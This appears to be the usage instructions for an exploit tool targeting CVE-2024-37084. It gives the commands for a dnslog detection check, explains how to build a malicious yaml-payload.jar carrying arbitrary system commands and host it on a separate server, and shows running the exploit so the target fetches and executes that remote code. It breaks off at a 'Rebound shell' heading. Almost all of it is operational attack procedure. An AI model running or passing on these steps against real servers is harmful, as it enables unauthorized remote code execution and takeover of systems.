- Use dnslog to detect whether CVE-2024-37084 vulnerability exists, Then manually check dnslog
python cve-2024-37084-exp.py -u http://192.168.67.135:7577 -dnslog xxx.dnslog.cn
- then you can Execute system commands
first: Enter the command you want to execute in src\artsploit\AwesomeScriptEngineFactory.java
after that: Double-click the. py file to generate the yaml-payload.jar file.
after that: Put yaml-payload.jar on the linux server and start a web service with python. Note: Every time you execute a different command, you need to rename yaml-payload.jar, that is, xx.jar that you access, with a different name every time. Otherwise the new command will not take effect.
The access path is as follows: http://192.168.67.133/yaml-payload.jar.
finally: Execute poc
cve-2024-37084-exp.py -u http://192.168.67.135:7577 -payload http://192.168.67.133/yaml-payload.jar
Enter the corresponding container to view and successfully execute the command.
Rebound shell:
